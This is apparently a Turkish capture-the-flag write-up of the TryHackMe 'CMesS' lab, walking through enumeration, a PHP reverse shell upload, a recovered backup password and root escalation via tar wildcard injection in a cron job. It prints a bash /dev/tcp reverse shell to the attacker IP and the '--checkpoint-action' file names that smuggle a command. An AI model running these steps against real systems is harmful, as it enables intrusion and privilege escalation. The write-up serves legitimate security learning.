Table of Contents
Merhabalar, bu yazımda sizlere TryHackMe platformunda bulunan “CMesS” isimli makinenin çözümü anlatacağım. Keyifli Okumalar…
Çözüm
1 — “cmess.thm” alan adını /etc/hosts dosyasına ekliyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "10.10.22.47 cmess.thm" | tee -a /etc/hosts
10.10.22.47 cmess.thm2 — Nmap aracını kullanarak makine üzerindeki açık portlar ve servisler hakkında detaylı bilgi ediniyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nmap -sS -sV 10.10.22.47
Starting Nmap 7.94 ( https://nmap.org ) at 2023-06-25 06:50 EDT
Nmap scan report for 10.10.22.47
Host is up (0.069s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel3 — FFUF aracı ile bir alt alan adı taraması yapıyorum ve “dev.cmess.thm” alt alan adını buluyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# ffuf -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u http://cmess.thm -H "Host: FUZZ.cmess.thm" -mc 200
*CENSORED*
┌──(root㉿kali)-[/home/kali/Downloads]
└─# echo "10.10.22.47 dev.cmess.thm" | tee -a /etc/hosts
10.10.22.47 dev.cmess.thm4 — “dev.cmess.thm” adresine gittiğim zaman andre adındaki kullanıcının giriş bilgilerine ulaşıyorum.
## Development Log
### andre@cmess.thm
Have you guys fixed the bug that was found on live?
### support@cmess.thm
Hey Andre, We have managed to fix the misconfigured .htaccess file, we're hoping to patch it in the upcoming patch!
### support@cmess.thm
Update! We have had to delay the patch due to unforeseen circumstances
### andre@cmess.thm
That's ok, can you guys reset my password if you get a moment, I seem to be unable to get onto the admin panel.
### support@cmess.thm
Your password has been reset. Here: *CENSORED*5 — Dizin taraması yapıyorum.
┌──(root㉿kali)-[/home/kali/Downloads]
└─# gobuster dir -u http://cmess.thm -w /usr/share/wordlists/dirb/common.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://cmess.thm
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.5
[+] Timeout: 10s
===============================================================
2023/06/25 07:09:01 Starting gobuster in directory enumeration mode
===============================================================
/.hta (Status: 403) [Size: 274]
/.htaccess (Status: 403) [Size: 274]
/.htpasswd (Status: 403) [Size: 274]
/0 (Status: 200) [Size: 3851]
/01 (Status: 200) [Size: 4078]
/1 (Status: 200) [Size: 4078]
/1x1 (Status: 200) [Size: 4078]
/About (Status: 200) [Size: 3339]
/about (Status: 200) [Size: 3353]
/admin (Status: 200) [Size: 1580]
/api (Status: 200) [Size: 0]
/assets (Status: 301) [Size: 318] [--> http://cmess.thm/assets/?url=assets]
/author (Status: 200) [Size: 3590]
/blog (Status: 200) [Size: 3851]
/category (Status: 200) [Size: 3862]
/cm (Status: 500) [Size: 0]
/feed (Status: 200) [Size: 735]
/fm (Status: 200) [Size: 0]
/index (Status: 200) [Size: 3851]
/Index (Status: 200) [Size: 3851]
/lib (Status: 301) [Size: 312] [--> http://cmess.thm/lib/?url=lib]
/log (Status: 301) [Size: 312] [--> http://cmess.thm/log/?url=log]
/login (Status: 200) [Size: 1580]
/robots.txt (Status: 200) [Size: 65]
/search (Status: 200) [Size: 3851]
/Search (Status: 200) [Size: 3851]
/server-status (Status: 403) [Size: 274]
/sites (Status: 301) [Size: 316] [--> http://cmess.thm/sites/?url=sites]
/src (Status: 301) [Size: 312] [--> http://cmess.thm/src/?url=src]
/tags (Status: 200) [Size: 3139]
/tag (Status: 200) [Size: 3874]
/themes (Status: 301) [Size: 318] [--> http://cmess.thm/themes/?url=themes]
/tmp (Status: 301) [Size: 312] [--> http://cmess.thm/tmp/?url=tmp]6 — Admin dizinine gidip andre kullanıcısının bilgileriyle giriş yapıyorum. Daha sonra “Content” kısmından “File Manager” sekmesine gidiyorum. PHP reverse shell yükleyip bir bağlantı elde ediyorum.
http://cmess.thm/assets/shell.php
┌──(root㉿kali)-[/home/kali/Downloads]
└─# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.8.94.51] from (UNKNOWN) [10.10.22.47] 59342
Linux cmess 4.4.0-142-generic #168-Ubuntu SMP Wed Jan 16 21:00:45 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
04:10:53 up 23 min, 0 users, load average: 0.22, 0.81, 0.52
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 7 — “/opt” dizininde “.password.bak” adında bir dosya buluyorum. Bu dosyada andre kullanıcısına ait parola yer alıyor. Andre kullancısına geçip ilk bayrağı elde ediyorum.
www-data@cmess:/home$ cd /opt
cd /opt
www-data@cmess:/opt$ ls -la
ls -la
total 12
drwxr-xr-x 2 root root 4096 Feb 6 2020 .
drwxr-xr-x 22 root root 4096 Feb 6 2020 ..
-rwxrwxrwx 1 root root 36 Feb 6 2020 .password.bak
www-data@cmess:/opt$ cat .password.bak
cat .password.bak
andres backup password
UQfsdCB7aAP6
www-data@cmess:/opt$ su andre
su andre
Password: *CENSORED*
andre@cmess:/opt$ cd /home/andre
cd /home/andre
andre@cmess:~$ ls
ls
backup user.txt
andre@cmess:~$ cat user.txt
cat user.txt
*CENSORED*8 — Cron tablosunu incelediğim zaman “/home/andre/backup” dizinin tar ile sıkıştırılıp /tmp dizinine kopyalandığını görüyorum.
andre@cmess:~$ cd backup
cd backup
andre@cmess:~/backup$ ls
ls
note
andre@cmess:~/backup$ ls -la
ls -la
total 12
drwxr-x--- 2 andre andre 4096 Feb 9 2020 .
drwxr-x--- 4 andre andre 4096 Feb 9 2020 ..
-rwxr-x--- 1 andre andre 51 Feb 9 2020 note
andre@cmess:~/backup$ cat note
cat note
Note to self.
Anything in here will be backed up!
andre@cmess:~/backup$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# m h dom mon dow user command
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
*/2 * * * * root cd /home/andre/backup && tar -zcf /tmp/andre_backup.tar.gz *9 — Burada “Tar Wildcard Injection” saldırısını kullanıyorum. Bu saldırı, bir tar parametresinin dosya adı olarak verilmesiyle kullanılıyor. Burada shell.sh adında bir betik oluşturup içine bash reverse shell komutu yazıyorum. Daha sonra gerekli parametreleri oluşturup bağlantı almayı bekliyorum.
andre@cmess:~/backup$ cat > shell.sh << EOF
cat > shell.sh << EOF
> #!/bin/bash
#!/bin/bash
> bash -i >& /dev/tcp/10.8.94.51/4445 0>&1
bash -i >& /dev/tcp/10.8.94.51/4445 0>&1
> EOF
EOF
andre@cmess:~/backup$ chmod +x shell.sh
chmod +x shell
andre@cmess:~/backup$ echo "" > "/home/andre/backup/--checkpoint=1"
echo "" > "/home/andre/backup/--checkpoint=1"
andre@cmess:~/backup$ echo "" > "/home/andre/backup/--checkpoint-action=exec=rh shell.sh"
<"" > "/home/andre/backup/--checkpoint-action=exec=sh shell.sh"10 — Root kullanıcısına geçtikten sonra ikinci bayrağımı elde ediyorum.
root@cmess:/home/andre/backup# cat /root/root.txt
*CENSORED*
